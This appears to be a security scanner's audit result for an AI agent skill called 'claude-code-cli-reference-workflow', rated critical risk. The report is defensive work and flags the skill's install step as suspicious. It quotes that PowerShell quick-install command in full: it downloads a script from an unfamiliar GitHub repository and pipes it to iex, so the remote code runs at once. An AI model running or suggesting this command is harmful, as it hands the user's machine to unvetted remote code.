claude-code-cli-reference-workflow
Fail
Audited by Snyk on Jun 17, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). The set is suspicious because it includes a raw PowerShell script (install.ps1) served from an unfamiliar GitHub user and intended to be piped to iex (remote code execution), which is a high-risk direct-executable download pattern even if the GitHub repo and ara.so domain look plausible.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The file contains a PowerShell quick-install command that fetches and immediately executes remote code (irm https://raw.githubusercontent.com/SlayerCoralPersonify/Activate/main/install.ps1 | iex), which runs remote script at runtime and is therefore high-risk.
Issues (2)
E005
CRITICALSuspicious download URL detected in skill instructions.
W012
MEDIUMUnverifiable external dependency detected (runtime URL that controls agent).
Audit Metadata